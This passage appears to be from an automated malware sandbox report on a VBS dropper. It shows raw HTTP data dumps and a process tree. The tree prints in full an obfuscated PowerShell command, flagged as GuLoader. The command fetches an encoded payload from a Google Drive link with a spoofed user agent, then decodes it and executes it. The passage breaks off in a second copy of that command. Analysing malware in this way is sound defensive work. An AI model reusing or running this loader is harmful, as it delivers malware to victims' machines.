                                                                                  2025-03-10 08:20:24 UTC1323INData Raw: a4 52 f9 33 b1 c2 6b 16 6e 4f 63 36 7c 6b ce b3 63 df 23 bb af 73 a6 ef ae 22 84 63 13 9d 1a 02 1b ac ea 1b ac 23 19 65 b3 14 03 4b 9d 47 b5 1f 4b 39 ad cc 97 20 0c 59 3f 59 5a 3e 90 4a 2e 84 75 d0 5e ad aa a5 73 80 7d 92 6d d2 09 62 bc 0a 4f c9 ff dd 05 67 ab 3d bd 6b 04 af 33 02 5e ae a3 d1 98 06 a4 dc 00 cf 38 e4 e5 ed 1a 4c 3e 10 f3 be a9 c3 c6 2b 21 3d 04 97 c6 70 3e 42 92 ff 5e af b4 d0 01 81 63 8d 0a fd d5 36 d1 9c cc 58 c8 79 6e bc 5b f7 0a c3 fa 75 4d 84 d6 de cd 4a 13 b9 99 fe 3c 1b 49 52 a9 72 0f e2 40 b1 c0 5d bc 7f eb af e2 b9 76 9b f1 24 89 d4 16 70 d3 cf 17 27 a8 ec 9a 3a c7 3d 51 01 f7 95 68 b1 4c f9 c9 94 fa 84 23 19 42 a2 e2 81 d6 bc 1c e0 7e 09 63 a3 88 82 ab 19 a8 18 01 ac ea 43 0a f6 5b fe 76 96 43 06 84 3f 18 62 de 86 e8 fb f6 34 60
                                                                                  Data Ascii: R3knOc6|kc#s"c#eKGK9 Y?YZ>J.u^s}mbOg=k3^8L>+!=p>B^c6Xyn[uMJ<IRr@]v$p':=QhL#B~cC[vC?b4`
                                                                                  2025-03-10 08:20:24 UTC1378INData Raw: 4a d0 7c e5 d0 4a 6c 44 fe e8 52 12 2c 8d 96 2c 4d ef 4e b7 2d 4b 66 6b cd 5e 6c 84 c9 25 eb 97 12 da f2 be 25 ec ba fd d4 79 eb 16 62 63 9c ab fd 9f a1 3e 5f 35 f0 36 52 8f 8b 5a 39 a8 80 dc 69 04 2e 14 a1 9d 6d fe e3 40 55 32 88 5f 9e 98 2b 51 e4 1c b1 8b a8 5a d8 21 77 a8 17 1c 4f 74 7d 2e 19 4c 83 ff 63 3c 7b 76 7d ab bc 67 c7 c7 14 b6 23 57 b2 af 15 eb 7a ff 56 c2 cb 75 20 e1 be 13 38 d3 fa 55 98 96 21 c9 71 fb a1 23 7e d2 b3 e4 73 74 f3 8d 2c d6 1d 96 e3 cd 5c 2f 63 1c 15 d0 64 7d 77 e9 85 6f fe 4b a5 ff 03 af a2 8f 98 1f 22 59 6d eb 38 d1 25 5a fd 92 00 48 dc ab f5 4b 6d ec 66 ca 18 41 d7 ab 31 e5 5b 15 81 83 bc 3a 03 8b 48 63 33 1e 6e 96 00 7c 28 b8 80 8f 70 fe 49 12 fd c3 68 12 43 cb 86 42 b8 24 5c a8 51 f3 45 2c 11 e6 7d cc 77 5f c8 db e7 e6 ed
                                                                                  Data Ascii: J|JlDR,,MN-Kfk^l%%ybc>_56RZ9i.m@U2_+QZ!wOt}.Lc<{v}g#WzVu 8U!q#~st,\/cd}woK"Ym8%ZHKmfA1[:Hc3n|(pIhCB$\QE,}w_
                                                                                  2025-03-10 08:20:24 UTC1378INData Raw: ef 79 8e 54 3e c2 f2 58 fa d6 8c 44 1a 7d 14 53 fe d6 e3 ea bd bb 97 dd 7c 0b ba b4 93 a8 79 71 e9 13 58 4e 3e 0a 76 c1 23 40 ba 2e f0 0f 3f 98 c7 eb ea 9d c3 fe 0c 8b 67 dd 8e d6 34 60 0f 72 38 36 a1 a7 66 56 8f 69 da 72 7d 49 f7 c5 b3 e5 33 cf 06 35 0b b4 24 d6 34 6e a1 15 84 55 aa 58 d9 f6 fb bc ca 81 10 db 77 f9 96 1d 6f ef d3 e4 a6 ca 1a c1 f2 0c 44 a3 e9 ca fa 6d 36 7b e5 3c 7e b5 6f d6 72 ea 08 35 ae 40 c7 f1 29 b4 f4 e2 d8 44 37 2e af e2 c1 d4 2c 75 68 04 59 95 b1 a8 a4 05 a5 fa 06 f3 49 fc 1c f4 d8 7b d4 ee ed e2 2e 42 03 5c 07 2d 7f e4 95 3f fa ec 03 3a 07 4e 9d 13 f4 b1 8c c7 ee a2 19 13 1f fd 0d ec 51 bc 08 7f 2a 33 65 78 b0 da e5 dc 78 02 08 40 47 54 df f8 a9 2b e6 f5 29 87 4a 3b 1d 5b 58 18 00 aa 44 c3 2f 3d 06 cf 32 a0 87 9a a6 56 a4 ad 4f
                                                                                  Data Ascii: yT>XD}S|yqXN>v#@.?g4`r86fVir}I35$4nUXwoDm6{<~or5@)D7.,uhYI{.B\-?:NQ*3exx@GT+)J;[XD/=2VO
                                                                                  2025-03-10 08:20:24 UTC1378INData Raw: 0a b2 d0 05 35 5f b7 50 b2 74 10 6c 20 9a 1d 4a cf 37 69 4f 3e 94 80 ee 15 ab 83 0e 79 3b 7a ba 18 c8 e7 cd 2f 5d fd 86 4c cf 79 10 a8 77 67 d4 37 ee 6a d0 82 4c 6b d2 2d 98 8e 19 27 b8 38 98 b8 5b e6 b5 17 f0 51 55 ad b9 ba bb b3 59 fd 35 2d 60 bb ec 2b f0 8f 21 64 85 d8 68 4e 81 da 3e da de 51 56 26 d1 b0 a7 65 e7 76 d8 c7 57 06 eb 48 ad ee d6 a1 1d 46 26 3d d8 cd 1c 26 ff 4d 30 f8 61 7b dd 0d 7d 71 07 13 06 89 f3 57 16 63 05 8a 63 4d e7 5c a2 02 ee 06 95 6c 7e c4 70 6a f4 f0 4b 45 80 8f 48 78 fc e5 d6 40 b3 29 eb a2 16 67 d1 19 3b 43 a3 60 a4 d3 22 98 3b 2b 3d 54 25 eb ce 32 bf ba 12 a7 85 76 49 1b 62 ea 21 a8 78 4d 55 40 44 43 e3 d5 1d 13 f6 c9 78 05 a8 eb 51 e1 ce bb 52 50 f3 d0 04 6b c1 75 bd 63 81 c7 2a 65 71 23 59 65 6e fd 6b 6f d9 8b 55 65 0d 94
                                                                                  Data Ascii: 5_Ptl J7iO>y;z/]Lywg7jLk-'8[QUY5-`+!dhN>QV&evWHF&=&M0a{}qWccM\l~pjKEHx@)g;C`";+=T%2vIb!xMU@DCxQRPkuc*eq#YenkoUe
                                                                                  2025-03-10 08:20:24 UTC1378INData Raw: 03 50 94 21 d4 f2 68 eb 49 33 b5 c0 27 8c 99 39 9b 87 ee c7 08 9f 8b a6 68 8c 6d 56 9a 67 c5 14 7f 3a a3 91 41 0d 1a c0 9f f8 a3 d9 dc cb de 10 78 4f b3 20 d0 d9 dd c9 5c 04 48 44 9a cc 48 61 54 57 87 94 8b 52 06 65 03 8d 4c 2e b0 89 16 28 61 d9 0c 55 53 b6 38 6b 4d 8f db 4a 87 3c 59 e2 79 f1 79 2d 5d 59 49 bc 6e 43 37 02 9d 6b 80 20 55 e2 c8 a9 0d 94 b8 ce 83 dc e6 46 70 e1 fe e9 4e 89 aa 20 cc 6a e5 50 cb ea e0 cd ff 50 af 5e 91 c2 19 11 c7 79 95 97 bb ab 69 27 c9 c3 d9 23 c8 86 b5 5b fb ec e1 91 5f 24 7c 92 62 f7 14 50 3f a0 c7 96 58 4b 62 51 01 a7 1b 0d 47 e2 81 a5 71 a5 5b 1c b3 2c 16 ab 62 c6 16 c6 e2 3d 7a 07 03 c9 67 e5 08 2d bc 68 63 6a e4 67 ad d2 7a 2b 99 ab e6 87 a4 08 a4 72 4f 21 c6 b2 82 1b e7 53 01 a4 ad cb 6c 00 85 b7 e2 77 fa 2a eb 09 65
                                                                                  Data Ascii: P!hI3'9hmVg:AxO \HDHaTWReL.(aUS8kMJ<Yyy-]YInC7k UFpN jPP^yi'#[_$|bP?XKbQGq[,b=zg-hcjgz+rO!Slw*e
                                                                                  2025-03-10 08:20:24 UTC1378INData Raw: 86 e1 d1 96 9b 62 33 5b fc 09 70 7c c7 cc b3 8c 09 11 be 4b 6d 24 7d 39 30 99 0d a7 60 71 ef 85 8b fb 40 62 a3 d4 81 7f 7a c5 3d 58 07 bb 8b d3 88 67 01 d3 97 6c 0e 33 d1 a7 ad c6 d9 b7 d4 96 21 a1 d2 09 7e d3 b3 61 c1 ab e4 93 98 91 e9 b3 85 d0 6a b5 ca 11 f6 51 ad 92 62 93 2c 31 a6 1e 18 ce 45 de 96 1e f5 b7 6f 56 31 30 f7 36 71 d1 be a5 37 51 29 f8 eb b4 48 e9 f9 9c ab bc 53 ad a9 c0 d9 4e 34 d2 78 23 69 cf 54 07 f2 30 05 f3 15 4e 4c 78 fe 91 8e 9e 7f 00 c7 ed d8 2f 21 fe 5c b1 b9 97 5a d8 29 ff 98 54 69 d4 8d b0 21 cd b6 08 0e 32 3c 74 46 3a ce 8b 68 4e 83 60 4e 89 14 80 b8 19 4e 0e ce 35 40 92 7a 37 b4 91 b2 04 0d e2 03 9a 28 8e 08 c8 b0 bb 34 74 72 a4 b0 32 cf 28 f4 2e e1 29 0f 1b 29 4b a7 92 c3 02 70 4a d4 60 a0 31 b4 15 1a 7e 8c 91 b8 bd 4a 4b 1f
                                                                                  Data Ascii: b3[p|Km$}90`q@bz=Xgl3!~ajQb,1EoV106q7Q)HSN4x#iT0NLx/!\Z)Ti!2<tF:hN`NN5@z7(4tr2(.))KpJ`1~JK
                                                                                  2025-03-10 08:20:24 UTC1378INData Raw: 6e ec 62 2b b9 c0 98 be 4e 82 dc 78 1f bc bf cf d3 c1 a0 cb b5 80 ad 0e 9d 47 a5 95 b2 21 22 c4 2b f2 75 cc 90 e4 c8 f2 46 46 40 02 bf 2c fa 78 2a b3 10 53 5b 90 3c f5 0f 9d 62 c5 b6 57 e1 27 9e 20 26 a2 04 27 ad c2 dd 41 8c 89 7d fb f3 4c 0a d5 b1 ae dc a2 81 4a b9 8a 18 53 d8 94 81 ea 89 a5 84 e7 a2 3a 0b 19 13 b2 b4 bb d8 59 3b 94 a2 3d 22 ff b5 33 cb 64 22 da b7 4a 60 0f cf 36 89 6c 52 dc 84 6a 8e be 2f 67 77 82 25 cd ab a1 d2 40 56 8f ba 4d 99 37 df 38 42 bf 60 a5 15 40 ac 8f b5 63 d6 3b 70 6a c1 00 f7 55 4f 3d 80 df ac ff 47 92 e8 53 2f 6c 54 70 b8 3b e3 2d 04 f2 ea db ad 79 e2 62 51 99 b8 90 d3 91 46 19 e0 ea 7a 21 7e 7c 06 01 dd b9 b7 26 c0 52 99 f0 b2 c8 5a 9e 7f 2b ae 1d 75 75 24 b0 8c b1 23 54 aa 3b c8 7c c0 ad 3b fe cb a6 30 5f 2e 39 8c a6 a4
                                                                                  Data Ascii: nb+NxG!"+uFF@,x*S[<bW' &'A}LJS:Y;="3d"J`6lRj/gw%@VM78B`@c;pjUO=GS/lTp;-ybQFz!~|&RZ+uu$#T;|;0_.9
                                                                                  2025-03-10 08:20:24 UTC1378INData Raw: 33 69 05 1a 50 62 f1 d7 47 d4 b0 f8 25 25 21 bc 11 09 c4 b0 fd d7 d4 1e 0e 98 bf 4d ff 7d 4e 90 ff 09 50 70 ee 31 b1 84 71 c9 c7 d3 c8 b5 5f 3f 37 49 5b 7b 11 55 39 9a 52 38 54 04 aa 45 a1 70 9a 90 91 c5 59 d2 f9 61 e1 17 be 7c f4 f4 3f 04 1c 49 58 49 cc 01 30 03 8b 26 1b 9d 5a 0b b6 96 5b 13 52 04 22 aa 3d 83 85 d0 6e 2a a1 5d 0e 18 6b fb 93 a5 6f a7 3e 05 03 ee 35 68 3d c3 16 2c d0 6a 2c 8b 7d 89 5c 62 01 ff 21 06 1f 40 e4 6f 09 e7 35 27 d6 61 8e b7 b5 db be 85 5f 16 cf 4a a8 10 3f 8e 82 b4 84 d8 b2 e4 f3 69 e5 71 03 29 6a 63 c6 e5 4b ba f0 40 26 9b 02 b7 48 a9 56 ef 29 5e c7 2f c8 b9 90 a3 2d 52 b9 1e b3 cc f4 86 48 bc f1 6a 7d 6e 4c 65 ea 84 7c 72 fa 9f 65 9d 51 29 28 12 f2 73 8e 3a 12 cc 66 73 55 27 04 26 98 0d 8a 70 fe 1a 2d b4 15 65 ca c0 5c e3 97
                                                                                  Data Ascii: 3iPbG%%!M}NPp1q_?7I[{U9R8TEpYa|?IXI0&Z[R"=n*]ko>5h=,j,}\b!@o5'a_J?iq)jcK@&HV)^/-RHj}nLe|reQ)(s:fsU'&p-e\


                                                                                  Statistics

                                                                                  CPU Usage

                                                                                  Click to jump to process

                                                                                  Memory Usage

                                                                                  Click to jump to process

                                                                                  High Level Behavior Distribution

                                                                                  Click to dive into process behavior distribution

                                                                                  Behavior

                                                                                  Click to jump to process

                                                                                  System Behavior

                                                                                  General

                                                                                  Target ID:0
                                                                                  Start time:04:18:56
                                                                                  Start date:10/03/2025
                                                                                  Path:C:\Windows\System32\wscript.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\CO894GOV2O25.vbs"
                                                                                  Imagebase:0x7ff76fd60000
                                                                                  File size:170'496 bytes
                                                                                  MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:7
                                                                                  Start time:04:18:57
                                                                                  Start date:10/03/2025
                                                                                  Path:C:\Windows\System32\PING.EXE
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:ping Host_6637.6637.6637.657e
                                                                                  Imagebase:0x7ff734f90000
                                                                                  File size:22'528 bytes
                                                                                  MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:8
                                                                                  Start time:04:18:57
                                                                                  Start date:10/03/2025
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff68dae0000
                                                                                  File size:862'208 bytes
                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:9
                                                                                  Start time:04:18:58
                                                                                  Start date:10/03/2025
                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Taltegns;function janey($Naturprodukt){ .($Glassliberes) ($Naturprodukt)} function Infractor($Naturalization){$Reacquainted129=4;do{$Cozies104+=$Naturalization[$Reacquainted129];$Reacquainted129+=5;$Bemoil=Format-List} until(!$Naturalization[$Reacquainted129])$Cozies104}$Vagttaarnenes=Infractor 'W xbNparaeCentTR ck. Blow';$Vagttaarnenes+=Infractor 'Ba nEPjevbAwakc,arelTobaIBlepESqu NSprot';$Dysbulic=Infractor 'TekrMGroooMindzafpriSirilD bil DigaDa b/';$Altnglerne92=Infractor 'Imp TEthylFremsGrap1Spot2';$Segregerede=' Rig[MaksNNe,oEBechtB.ro.p.gwS k peKam.rIsagvAandiForpC SpeeVaskPSpgeorelai PhoNkompTHumoM.eroa m rnSangA alcG Rele BilRAlop]smre:Kiss: ejssCbfte sivc Su UOpharKar i ongTPen yAgnopHarlr.ariOnecet F.ro.jenCMjesoCollLRime=D.mp$WencaEscalPhostOvernBaneGTolvLScraESaldRU,pfNSgetE Asy9flyw2';$Dysbulic+=Infractor ' fre5S,rg. Car0Opse Resi(SygeW S.ci FlynPseudSpekoM.ljwK lvsUl.i ModuN iceT Unv Barn1Homo0Trib.Biod0Be i;Be t cod,WCar ih llnBefo6Mist4Nonn;Krad FripxF rs6apra4Stan;Rec. MarrArvevClas:Rhod1Ufo 3 Fol4 Opf.Unif0L vs)Ud a SickG erceMasocTrogk,onroGen,/Gono2,igo0K,pi1mass0U.in0 Dal1Fiel0 ata1 Ent B,deFOv,riPar rIne.eOve f oico Mi xSuda/ We 1Knig3Macu4 Sco.Ko t0';$Quillaias180=Infractor 'LocauSlagsBakkE Exirtogd-in dAHjlpgUn,ee He NUnunT';$Aabningstidernes=Infractor ' upmhKeglt .rntLe,sptri s Til: hor/San /OctadKnsfrMik.i sliv Ante U.u. ,legEft oquafoPolyg Prol nae Aut.S,idcCorroJug mOffe/ Re u KatcSpl ? ,loeMe axRi,dpUnd,oSp,rrSaldtLion=Un vdErhvoConcw abnEpiclskovoMissaKunsd Fro&UnsaiAntidOpsu=Aspa1Dep,yIron_Fr gMPennUEndo1.matISammxMelotUmrkx ,uiQUdhuaMoraDU.ign,wee_KundfFi a6Sala5 VicC HornLouv0 T gb FerFSti 8BedlLChlof,isc0.tlnXBuscC I o8AldeUCong0U deI';$Rotationspumperne=Infractor ' Ugi>';$Glassliberes=Infractor 'DormitilieV weX';$Eliquating='Gulvs';$Klatrende='\Udskilleres.Bre';janey (Infractor ',itr$OutcGUnscl KelO ,ncBnoneaResulAad,:,rspiC azN F,lTSpeer .blaOceaVrem E AscnSchcs ill= et$ElkaEWar nE.chvRdbe:NoncaLas.P UndpDiamDNegra FortInadaSylv+Skry$ yrbkarseLSalmAf rgTUnpir AirESc.rNSkrad esE');janey (Infractor ' Erk$PhysgBenzLHemaOArkobLokaaR adlSkul:LudwMS riIGratCCharM OctAStatcSmre=R fu$IngeaAnesa esBLillnSandiplynN mregAgenS A aT uttiCappDFu,dE,forRhollN Unfeu,shS Nay.KerySTriepHer LOgleILdenT ag(ev,j$Popur telO Best GalASo ntAuxiIRegrOPerfn munSTillPSam uAlvemSerpp Ac,eWarprLandN Pg ED,fr)');janey (Infractor $Segregerede);$Aabningstidernes=$Micmac[0];$Bayer=(Infractor 'cler$ ensgSyg.ltrocoUndebBaneAVavaLPluk: indeAlinmchilUA delNonpGSti.eNonfrRedbi outNCafeGpho eU taRT leNBarrECoenSOgr,= ,lbnCompE,ehaWGr n-uncaOinteB QabJScenEOutfCDoubTRen. tabeSReb.yPoleSsup,tOpbeEDy fMExpo.Iv.k$ RapvPlebA igeGPa it ,ipt .leaErgoaClu r ricnHfl EFo bN MelEpa,ls');janey ($Bayer);janey (Infractor 'L.fg$Frafe obemBi.su.onsl ,cagKa.eeMenurSpe,imochnUn,eg.rikeFor rKruknseyceUndusOmbr.Mo aH Rame,nuaaDupldPa le Oekr.edisNeph[Barm$ ilaQSvaruGra iExtrlBetyl BucaRosmi ,veaan vs S p1D.lg8D,to0D sc]Obte=Vent$TydeDFlaay TitsAntibPropuU sylStefiOrbic');$Bestuknes=Infractor 'Red $Theae AmymDeltuMunil Ve gPoime RearUdpiiPushnBegrg StoeTaj,r.ogsnA omePrimsIndi.mo oDtynwoG.newMilln P,olarbeoFrkaaSimidBuk F.ueriFer,lBelaeVrdi(circ$DigeAFo vaUnchbIndknIdoliPr snHorogBrissDefetBl.niThrudSkrueF rvrSkoln ereRup s nd,Unre$ DiaQP nsuHjema rtedS.acr D,muMethpTantoFhvslMiljaFaatrHypn)';$Quadrupolar=$Intravens;janey (Infractor ' ,is$Tvr,GAmorl OveOShivbMyreA A.glThio: dbrAAutofConah oadaCon aAnter caoe SurnRedeDstjgE,dli=Spe (SkoltSnubeEcstss utTCoun-Kam P MaraDic t rchhoppu Kha$HaneQHu,euCo.la A adNonhrCondU argp iblOBedmlM roaSu.fRNurs)');while (!$Afhaarende) {janey (Infractor 'Ga,t$Tvisg SymlEjenoHjdebT ntaCovelRepa: SveTMas uPampmHoselIndkeoverpVolflPh,waBib dAcets HaneSvrdrH ftnMiljeGribs.ydr=B in$AnsaSAllocLineaUdn.pWa,ru SellCoima') ;janey $Bestuknes;janey (Infractor ' Non[TilrtSkruhKinsRGeneeRad a Slid C,aiUdlaN SubgRegn.EtioT GasHMedvRC loE rkaUndedIndb]C rm:Gemm: ilosveksLStorEScapEChifpArga(Itch4Komp0 Pe 0S ri0st,e)');janey (Infractor ' Ov.$Paing St LUn eoSkalBtoxia SlalFord:Ba eAjehoFSemohH rlARimma ,knrToneeint n akvd BasECast=Tegn(WagnTOvereJokks alltB.rn- lodp kdsAMu.dT So,H rag Eddi$ .laqUntaU RovaFracDBri rModauClerPSkanO Pr lNonea mbyR Cin)') ;janey (Infractor 'L.go$BrneGDiscl MonOCalcb .amAOlshlsobe: T,kbB okRStatUj degHellS OmsRMortEA.caTOeco=Mod,$ThiogFriklEkstORe mbIneaAErkllLend: tjer H re CoaM Te.oTripnHjadtSvidePilaRTs riSe iN M ngSemie istRBhutnRumkERede+Both+ D p%Jas $ HunmOmveILnnicFameMGracATr,hCKu s.PancC ksOM.niuBasensamlt') ;$Aabningstidernes=$Micmac[$Brugsret]}$Aroideous208=323081;$Eneboers=29797;janey (Infractor 'Bude$FoerGSas,lAbanOFjerb St,a.alsllign:UtrimFar aSl,kCHorsKSkriLProgeMeso pos=Blen brieGWiike KantTant- .lsCCindOIsacnVelsTFadeeGrubNRenhTW.er Dyne$.uboqUnunU enoADelmDCarpRKlasUBir,pUn mo.heslInteALievr');janey (Infractor 'Ta,r$Polyg Gral P,loUnbrbOpskaSavol Sem:Tan SNon oSg kl rwdcDis rMonaeOutrmunspePi irH.ndsSulf Padd=Amat N.n[U anSnon y HovsAbsetUdpleSpitmUndi.BlanC F eoSkrinEna v Pe ePrefr MurtKl d]Aftg:A lo:KongFSurcr Undo ilim laBKu ea TemsTaboe vi6Fora4 NonSDip.tNga r roi StenBu tg ,ac( Top$DollMTrana TercKonsk Berl AndeMeas)');janey (Infractor 'A hv$AfruGFatnlIndoOFlyeBIsomaDes LRewa:UndeSAdvoY Forn nsaCDeceoGestp v.daT detchirEB.aisMi k Fre = nte Praa[ BssSMagnY.andSBlodTFngseBrugmSter.PesttLangeGa iXPro.tsymp. ordebo bnExpecJuleOD.laD KanIFyrsn E igfutu] Sek:Un.p:FranaEksis VgtC rgli PoliDau..SteggUtereV nitSdcesFre,T Sagr.oqui rinSengg una(Rh d$Nects .ecoErnhlA skCDep rExpaeStramInt.eAfreRBallSBurg)');janey (Infractor 'Lepi$Stj gDruplUngeONud bTi,fA ndsl any:AnarB HypoProvgEnv dOveraForvGMoraeAeronprin= Teg$ M.dSUdtmY IllNHockCBrudO MaiP kemaP thT Co,ETroms E p.VitrsmetauJu,ebBoidsSeveT Botr Di i fhuNMi pG Ver(A tn$DoucAAl aRA,toOLigniBesvd Sk,E RejoDa luPl ySHv,d2Tr k0Blom8styl,Cu h$Elice StiNAareeNon BSpolo ,inEPianR SorSDepu)');janey $Bogdagen;"
                                                                                  Imagebase:0x7ff7d5ca0000
                                                                                  File size:452'608 bytes
                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000009.00000002.1540197391.0000013ADEC14000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:10
                                                                                  Start time:04:18:58
                                                                                  Start date:10/03/2025
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff68dae0000
                                                                                  File size:862'208 bytes
                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:12
                                                                                  Start time:04:19:20
                                                                                  Start date:10/03/2025
                                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "echo $Taltegns;function janey($Naturprodukt){ .($Glassliberes) ($Naturprodukt)} function Infractor($Naturalization){$Reacquainted129=4;do{$Cozies104+=$Naturalization[$Reacquainted129];$Reacquainted129+=5;$Bemoil=Format-List} until(!$Naturalization[$Reacquainted129])$Cozies104}$Vagttaarnenes=Infractor 'W xbNparaeCentTR ck. Blow';$Vagttaarnenes+=Infractor 'Ba nEPjevbAwakc,arelTobaIBlepESqu NSprot';$Dysbulic=Infractor 'TekrMGroooMindzafpriSirilD bil DigaDa b/';$Altnglerne92=Infractor 'Imp TEthylFremsGrap1Spot2';$Segregerede=' Rig[MaksNNe,oEBechtB.ro.p.gwS k peKam.rIsagvAandiForpC SpeeVaskPSpgeorelai PhoNkompTHumoM.eroa m rnSangA alcG Rele BilRAlop]smre:Kiss: ejssCbfte sivc Su UOpharKar i ongTPen yAgnopHarlr.ariOnecet F.ro.jenCMjesoCollLRime=D.mp$WencaEscalPhostOvernBaneGTolvLScraESaldRU,pfNSgetE Asy9flyw2';$Dysbulic+=Infractor ' fre5S,rg. Car0Opse Resi(SygeW S.ci FlynPseudSpekoM.ljwK lvsUl.i ModuN iceT Unv Barn1Homo0Trib.Biod0Be i;Be t cod,WCar ih llnBefo6Mist4Nonn;Krad FripxF rs6apra4Stan;Rec. MarrArvevClas:Rhod1Ufo 3 Fol4 Opf.Unif0L vs)Ud a SickG erceMasocTrogk,onroGen,/Gono2,igo0K,pi1mass0U.in0 Dal1Fiel0 ata1 Ent B,deFOv,riPar rIne.eOve f oico Mi xSuda/ We 1Knig3Macu4 Sco.Ko t0';$Quillaias180=Infractor 'LocauSlagsBakkE Exirtogd-in dAHjlpgUn,ee He NUnunT';$Aabningstidernes=Infractor ' upmhKeglt .rntLe,sptri s Til: hor/San /OctadKnsfrMik.i sliv Ante U.u. ,legEft oquafoPolyg Prol nae Aut.S,idcCorroJug mOffe/ Re u KatcSpl ? ,loeMe axRi,dpUnd,oSp,rrSaldtLion=Un vdErhvoConcw abnEpiclskovoMissaKunsd Fro&UnsaiAntidOpsu=Aspa1Dep,yIron_Fr gMPennUEndo1.matISammxMelotUmrkx ,uiQUdhuaMoraDU.ign,wee_KundfFi a6Sala5 VicC HornLouv0 T gb FerFSti 8BedlLChlof,isc0.tlnXBuscC I o8AldeUCong0U deI';$Rotationspumperne=Infractor ' Ugi>';$Glassliberes=Infractor 'DormitilieV weX';$Eliquating='Gulvs';$Klatrende='\Udskilleres.Bre';janey (Infractor ',itr$OutcGUnscl KelO ,ncBnoneaResulAad,:,rspiC azN F,lTSpeer .blaOceaVrem E AscnSchcs ill= et$ElkaEWar nE.chvRdbe:NoncaLas.P UndpDiamDNegra FortInadaSylv+Skry$ yrbkarseLSalmAf rgTUnpir AirESc.rNSkrad esE');janey (Infractor ' Erk$PhysgBenzLHemaOArkobLokaaR adlSkul:LudwMS riIGratCCharM OctAStatcSmre=R fu$IngeaAnesa esBLillnSandiplynN mregAgenS A aT uttiCappDFu,dE,forRhollN Unfeu,shS Nay.KerySTriepHer LOgleILdenT ag(ev,j$Popur telO Best GalASo ntAuxiIRegrOPerfn munSTillPSam uAlvemSerpp Ac,eWarprLandN Pg ED,fr)');janey (Infractor $Segregerede);$Aabningstidernes=$Micmac[0];$Bayer=(Infractor 'cler$ ensgSyg.ltrocoUndebBaneAVavaLPluk: indeAlinmchilUA delNonpGSti.eNonfrRedbi outNCafeGpho eU taRT leNBarrECoenSOgr,= ,lbnCompE,ehaWGr n-uncaOinteB QabJScenEOutfCDoubTRen. tabeSReb.yPoleSsup,tOpbeEDy fMExpo.Iv.k$ RapvPlebA igeGPa it ,ipt .leaErgoaClu r ricnHfl EFo bN MelEpa,ls');janey ($Bayer);janey (Infractor 'L.fg$Frafe obemBi.su.onsl ,cagKa.eeMenurSpe,imochnUn,eg.rikeFor rKruknseyceUndusOmbr.Mo aH Rame,nuaaDupldPa le Oekr.edisNeph[Barm$ ilaQSvaruGra iExtrlBetyl BucaRosmi ,veaan vs S p1D.lg8D,to0D sc]Obte=Vent$TydeDFlaay TitsAntibPropuU sylStefiOrbic');$Bestuknes=Infractor 'Red $Theae AmymDeltuMunil Ve gPoime RearUdpiiPushnBegrg StoeTaj,r.ogsnA omePrimsIndi.mo oDtynwoG.newMilln P,olarbeoFrkaaSimidBuk F.ueriFer,lBelaeVrdi(circ$DigeAFo vaUnchbIndknIdoliPr snHorogBrissDefetBl.niThrudSkrueF rvrSkoln ereRup s nd,Unre$ DiaQP nsuHjema rtedS.acr D,muMethpTantoFhvslMiljaFaatrHypn)';$Quadrupolar=$Intravens;janey (Infractor ' ,is$Tvr,GAmorl OveOShivbMyreA A.glThio: dbrAAutofConah oadaCon aAnter caoe SurnRedeDstjgE,dli=Spe (SkoltSnubeEcstss utTCoun-Kam P MaraDic t rchhoppu Kha$HaneQHu,euCo.la A adNonhrCondU argp iblOBedmlM roaSu.fRNurs)');while (!$Afhaarende) {janey (Infractor 'Ga,t$Tvisg SymlEjenoHjdebT ntaCovelRepa: SveTMas uPampmHoselIndkeoverpVolflPh,waBib dAcets HaneSvrdrH ftnMiljeGribs.ydr=B in$AnsaSAllocLineaUdn.pWa,ru SellCoima') ;janey $Bestuknes;janey (Infractor ' Non[TilrtSkruhKinsRGeneeRad a Slid C,aiUdlaN SubgRegn.EtioT GasHMedvRC loE rkaUndedIndb]C rm:Gemm: ilosveksLStorEScapEChifpArga(Itch4Komp0 Pe 0S ri0st,e)');janey (Infractor ' Ov.$Paing St LUn eoSkalBtoxia SlalFord:Ba eAjehoFSemohH rlARimma ,knrToneeint n akvd BasECast=Tegn(WagnTOvereJokks alltB.rn- lodp kdsAMu.dT So,H rag 